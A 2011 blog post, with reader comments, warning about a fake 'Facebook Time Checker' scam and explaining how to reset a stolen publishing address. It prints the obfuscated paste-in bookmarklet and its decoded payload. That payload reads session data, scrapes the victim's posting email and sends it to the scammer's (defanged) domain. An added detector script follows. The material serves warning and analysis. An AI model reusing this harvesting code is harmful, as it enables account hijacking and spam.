Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker !

HERE IS HOW MY FACEBOOK PERSONAL PUBLISHING ADDRESS GOT STOLEN:
Update 2011.01.25 – For a complete German language translation you can visit Elias’s blog.

( Using their personal publishing address, a Facebook user can post pictures and messages by sending an email directly to that address. If someone knows your personal publishing address, they can impersonate you and post messages and pictures without your consent, or without you even knowing. Ill-intentioned persons can use this to spam Facebook beyond usability. )

I recently ( 2011.01.18 – around 00:00, GMT ) clicked a link sent by a friend of mine on Facebook and … I eventually did what they told me to do. I was a little bit tired and not very attentive to the job at hand.

The link looked like: ” Ive spent over 132 hours on facebook in my lifetime! Wow that’s a lot of time wasted! Find out how much time you’ve spent on facebook here – http://g_o_o.gl/AYkjm” ( the “_” in the website name is intentionally added by me here and in the following links to prevent unintentional clicking ). This shortened address “http://goo.gl/A_Y_k_j_m” forwarded me to “http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/next.php?id=SCiGm_d“. The page I arrived at was called “Facebook Time Checker“. The page pretended that by doing some “browser magic” I would get as a result the amount of time I have spent on Facebook!

IT IS NOT TRUE! ONLY FACEBOOK KNOWS THIS, AND IT IS NOT PUBLIC!
IT’S JUST A GOOD PRETEXT FOR A THIRD PARTY TO STEAL YOUR PRIVATE INFORMATION!

They advised me to copy and paste this JavaScript into my browser’s address bar to check the time I had spent on Facebook up to now.

Here is the JavaScript ( DON’T EVEN THINK OF COPY-PASTING THIS INTO YOUR BROWSER ):

javascript:var _0xbdfc=[
"\x73\x63\x72\x69\x70\x74",
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",
"\x73\x72\x63",
"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6e\x65\x77\x73\x31\x37\x63\x68\x61\x6e\x6e\x65\x6c\x2e\x63\x6f\x6d\x2f\x74\x69\x6d\x65\x2f\x6d\x6f\x62\x69\x6c\x65\x2e\x6a\x73",
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64",
"\x62\x6F\x64\x79"
];
var script=document[_0xbdfc[1]](_0xbdfc[0]);
script[_0xbdfc[2]]=_0xbdfc[3];
document[_0xbdfc[5]][_0xbdfc[4]](script);
void(0);

I did as they said, mostly because I was doing things mechanically at that time…

Then I realised that maybe I had done something bad, so I started checking what the script was doing.

First I translated the script into a human-readable form (each "\xNN" escape is just the hex code of one character; the array holds the six strings the script uses, and each _0xbdfc[n] below is a lookup into it):

javascript:var _0xbdfc=[
"script",
"createElement",
"src",
"http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/mobile.js",
"appendChild",
"body"
];
var script=document[_0xbdfc[1]](_0xbdfc[0]);
script[_0xbdfc[2]]=_0xbdfc[3];
document[_0xbdfc[5]][_0xbdfc[4]](script);
void(0);

Obviously this appends a script tag to the page that loads a JavaScript file from that remote server, so that file runs inside our current Facebook session.

Let’s check the mobile.js file:

    //Append jquery library
    var newjs = document.createElement('script');
    newjs.setAttribute('src', 'http://s_o_c_i_a_l_g_i_f_t_s.info/jquery.js');
    document.body.appendChild(newjs);
    setTimeout(function(){
        //Grab post form id and other stuff for posting
        if(location.href == "http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/index.php")
        {
            alert("Wrong Page. You must paste the script into your browser's\n address bar on any facebook tab or window.\n\n Then Hit Enter!");
            return;
        }
        var uid     = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
        //grab mobiles
        $.get("http://m.facebook.com/upload.php", function(data){
            var mydata = data;
            var mobiles;
            var count = 0;
            $($(mydata).find('a').filter(':contains("m.facebook.com")')).each(function(){if(($(this).text() != undefined)){ mobiles += $(this).text() +";";}});
            var clean = mobiles.replace("undefined","");
            var cut = clean.slice(0,clean.length - 1);
            var insert = cut.replace(/;/g,",");
            //Redirect to php inserter which redirects back to next set of steps.
            top.location.href = 'http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/check.php?get=1&m=,'+insert;
        });
    },2000);
    alert("Time Checker Processing - Please wait 2 seconds and click OK to view results.");

By looking at this file we can immediately recognize that the script loads your mobile Facebook upload.php page (using your logged-in session) and then harvests the text of every link on it that contains “m.facebook.com”.

The text contains your personal upload email.

The last thing the script does is send this email address back to the third-party website, as a parameter of the check.php URL it redirects you to.

They now control your Facebook! Using this email address they can post anything to your Facebook page without your permission!!

If by mistake you, like me, already did all the stuff you are not supposed to be doing … you need to:

!!! GO TO YOUR http://m.facebook.com/upload.php PAGE AND RESET YOUR PERSONAL PUBLISHING ADDRESS !!!

By resetting the address, Facebook generates a new one for you! It’s OK because the attacker has no way to find out your new publishing address!

I really hope people read this in time not to “F”word their Facebook! If you know other websites hosting this type of attack please let us know ( comments are welcome ). Below is a list of such websites ( “_” added to prevent the risk of an unintentional click ):

  • http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/
  • http://2_2_0.1_1_2.3_6.1_7_8/

UPDATES

2011.01.23 – It seems German Facebook users are also being tricked into using this JavaScript, and probably many more users in other languages. If someone is able to translate this post into other languages so that others can read it in their mother tongue, we welcome the help. Please let me know if there are such translations and provide us with the appropriate link. I hereby permit anyone to translate the content of this post as long as the translated version links to this page.
2011.01.24 – Serbian users are also being tricked into using a different form of the script. I have dedicated another post to this one. The principle is the same: one pastes a JavaScript snippet into the browser’s address bar, which in turn loads another, more potent script. Searching the internet for more references, I found that these scripts are not as new as I thought they were. The only problem is that social websites are making them viral. I guess Facebook should implement some system to filter these scripts automatically: it could check its users’ posts against some patterns and also check the links users provide for traces of such scripts. As far as I know about their copyright policy, they own the rights to do whatever they want with user content… so this should be no problem whatsoever.
2011.01.25 – Elias made a complete translation of my post into German here. Thanks!
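As an added example that is not part of the original post, serving both the manual translation step above and the post-filtering idea in the 2011.01.24 update: the script below decodes a `_0xbdfc`-style hex-escaped string array, substitutes the references back into the code, and flags the decoded script when it creates a script element pointing at a host outside facebook.com. The sample bookmarklet is constructed in the same shape as the one above, with the placeholder host attacker.example instead of the real one.

```javascript
// Added example, not code from the original post: decode the hex-escaped
// string array the bookmarklet uses, rebuild readable source, and flag the
// "create a <script> tag pointing at a foreign host" pattern it hides.

// Turn "\x73\x63" style escapes inside a string literal body into characters.
function decodeHexEscapes(body) {
  return body.replace(/\\x([0-9a-fA-F]{2})/g, (_, hh) =>
    String.fromCharCode(parseInt(hh, 16)));
}

// Find `var NAME=[ "...", ... ];`, decode each element, then substitute every
// NAME[i] reference in the remaining code with the decoded string literal.
function deobfuscate(src) {
  const m = src.match(/var\s+(\w+)\s*=\s*\[([\s\S]*?)\];/);
  if (!m) return { table: [], decoded: src };
  const [, name, listBody] = m;
  const table = [];
  const lit = /["“]((?:\\.|[^"”\\])*)["”]/g; // accepts the blog's curly quotes too
  let s;
  while ((s = lit.exec(listBody)) !== null) table.push(decodeHexEscapes(s[1]));
  const rest = src.slice(m.index + m[0].length);
  const ref = new RegExp(name + "\\[(\\d+)\\]", "g");
  return { table, decoded: rest.replace(ref, (_, i) => JSON.stringify(table[Number(i)])) };
}

// Heuristic a post/link filter could apply: the decoded code builds a script
// element and points a URL at a host outside facebook.com.
function analyzeBookmarklet(src) {
  const { table, decoded } = deobfuscate(src);
  const makesScript = /createElement["'\]\s]*\(\s*["']script["']\s*\)/.test(decoded);
  const urls = decoded.match(/https?:\/\/[^\s"'<>]+/g) || [];
  const remote = urls.filter((u) => !/^https?:\/\/([\w-]+\.)*facebook\.com(\/|$)/i.test(u));
  return { table, decoded, makesScript, remote, suspicious: makesScript && remote.length > 0 };
}

// Constructed sample shaped like the bookmarklet above; attacker.example is a
// placeholder host, not the real one.
const hex = (s) => [...s].map((c) => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const SAMPLE = 'javascript:var _0xbdfc=["' +
  ["script", "createElement", "src", "http://attacker.example/time/mobile.js", "appendChild", "body"]
    .map(hex).join('","') +
  '"];var script=document[_0xbdfc[1]](_0xbdfc[0]);script[_0xbdfc[2]]=_0xbdfc[3];' +
  'document[_0xbdfc[5]][_0xbdfc[4]](script);void(0);';

const report = analyzeBookmarklet(SAMPLE);
console.log(report.decoded);
console.log("suspicious:", report.suspicious, "remote:", report.remote);
```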


27 Responses to “Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker !”

  1. HN Says:
    January 19th, 2011 at 5:35 am

    Hi there,

    I have done exactly the same thing as you… and fortunately you are the first one who dealt with the problem.
    I also followed the steps you said, but my problem is that I can’t reset the publishing address to “zero”; Facebook just generates a new one. Do you have any solution for that?
    Or is there a possibility where I could enter my new publishing address instead of resetting it?!

    Thanks in advance!

  2. mas Says:
    January 21st, 2011 at 5:00 pm

    Thank you very very much for this Dan!!
    I also did this, and then I got these spam messages in my profile.
    Now I did a reset of my mobile-phone upload address and I hope it will work 😉

    So thank you, you are the best!

  3. willie Says:
    January 21st, 2011 at 5:55 pm

    Today some friends posted this rubbish in german FB and I searched for
    a) the problem
    b) the solution

    I found both! :))

    The mobile.js changed its location to China: http://2_2_0.1_1_2.3_6.1_7_8/ and we have German js-messages, too.

    The “social gift” (in german: “social poison” 😉 lasts.

    Many thanks!

  4. Dan Says:
    January 22nd, 2011 at 10:48 am

    HN,
    as long as you have generated a new Facebook publishing email address the problem is solved! I think you cannot disable this option yet, but the attacker has no way of knowing your new address as long as you don’t use their script!

    Regards,
    Dan

  5. vinz Says:
    January 23rd, 2011 at 7:30 am

    http://2_2_0.1_1_2.3_6.1_7_8/~biznews2/time/next.php?id=gTttGd

    but luckily I googled the script before I copy&pasted it 😉

  6. Andrea Mayer-Edoloeyi Says:
    January 23rd, 2011 at 3:04 pm

    Thank you very much!

  7. John Says:
    January 23rd, 2011 at 3:09 pm

    Thank you very much for this!!
    But I have a question. I pasted the script into the default Facebook home (www.facebook.com) and not into the m.facebook.com one.
    Does it save me from the scam?

  8. » Just so that this gets known too. This Fratzenb … Nachtwächter-Blah Says:
    January 23rd, 2011 at 4:07 pm

    […] Fratzenbuch app that supposedly determines how much time you have spent on Fratzenbuch is nasty malware. Anyone who has tinkered this junk into their account has handed a couple of spammers, or something even worse, […]

  9. Tweets that mention Useful for me » Blog Archive » Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker ! -- Topsy.com Says:
    January 23rd, 2011 at 4:54 pm

    […] This post was mentioned on Twitter by Niels Heidenreich and Elias Schwerdtfeger, Michael Witkowski. Michael Witkowski said: Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker ! http://j.mp/hasSJg via @AddToAny […]

  10. Beware, Facebook Fraud! » Facebook, Posting, Profile, Publishing, Address, Page » DIGITAL AFFAIRS Says:
    January 23rd, 2011 at 5:21 pm

    […] This is how you catch the oh-so-funny posting with the blue Facebook clock and the text “I’ve spent over 27 hours on facebook in my lifetime! Wow that’s a lot of time wasted!…” – and this is how you get rid of the posting and prevent spam from being posted again via the Facebook Mobile Publishing address. […]

  11. Dan Says:
    January 23rd, 2011 at 11:45 pm

    No! As long as you are logged in to Facebook using that browser the scam works 🙁
    The script loads the mobile version without you even knowing it!

    Dan

  12. Nasty JavaScript malware for Facebook « Unser täglich Spam Says:
    January 24th, 2011 at 8:46 am

    […] following text is a quick translation of an English-language text in the blog „Useful for me“. Publishing a translation is explicitly permitted there, and because this […]

  13. Elias Says:
    January 24th, 2011 at 8:52 am

    I made a complete translation of your post into German, together with some annotations for the less technically literate.

    Thanks for your great post!

  14. Patricia Says:
    January 26th, 2011 at 9:03 am

    If I reset the personal publishing address, do I have to do anything on an Android phone that has my FB app on it, too?

  15. Simon Says:
    January 27th, 2011 at 6:15 am

    Thanks for the help man!!

  16. Dan Says:
    January 27th, 2011 at 9:30 pm

    If you have used by mistake exactly this script then just resetting your personal publishing address is enough.
    Your Android/iPhone app is not affected by this in any way.

  17. Valraven Says:
    January 29th, 2011 at 2:33 am

    Hello,

    Ahem, thank you. Really useful

  18. WARNING SPAM - Socjomania Says:
    February 14th, 2011 at 3:07 am

    […] the necessary data and I set off to look for a solution on Google. The blog Useful for me came to the rescue, describing a similar way of stealing information from Facebook. Becoming a fan of the application and […]

  19. timovanmoke Says:
    February 15th, 2011 at 10:15 am

    Hey,

    thanks a lot for your solution, it already worked out for my personal page.
    But what about fan pages I’m admin of? I’ve got a fan page with 4 different persons as admins. Unfortunately I was the only one that clicked on that shit. Anyway..

    I already cut myself off as admin, but the script is still posting to my fan page.
    So is there another mobile address for fan pages?
    Maybe you’ve got any ideas.

    thanks a lot!

  20. Simon Munk Says:
    February 15th, 2011 at 8:51 pm

    Thank you very much! have been looking for a solution for a long time.

    Regards Simon

  21. debasishgang7 Says:
    February 20th, 2011 at 4:23 am

    Great article.. I want to know, can I decode JavaScript obfuscated code???

  22. Dan Says:
    February 22nd, 2011 at 8:43 am

    Can u give me a more specific example of code? I am not very familiar with JavaScript obfuscation but, because Java is a high level language that will compile in a high level form, it should not be so hard to reverse the parts of the code you need.

  23. arash Says:
    April 11th, 2011 at 2:55 pm

    I have the same problem:
    One of my friends tagged me in this post “wtf guys, you appeared as the people who stalked me the most, you can see yours at http://zxc.fbglitch-b.info/?p3j9xhk”, I went there and I did things, and now my account automatically sends spam and messages to my friends!!!

  24. arash Says:
    April 11th, 2011 at 3:17 pm

    Thank you Dan, I will translate this post to Persian 🙂

  25. workplace theft Says:
    September 19th, 2011 at 5:04 am

    Hi there very cool web site!! Man .. Beautiful .. Superb .. I will bookmark your blog and take the feeds also?I am happy to search out so many useful information right here in the post, we want work out extra techniques in this regard, thank you for sharing. . . . . .

  26. emoticons do facebook Says:
    November 21st, 2011 at 2:50 pm

    Remarkable issues here. I’m very glad to peer your article. Thanks so much and I am taking a look forward to contact you. Will you please drop me a mail?

  27. Mark Says:
    January 14th, 2012 at 10:29 am

    I cannot see where you can reset your personal publishing address. Have they removed this ability?
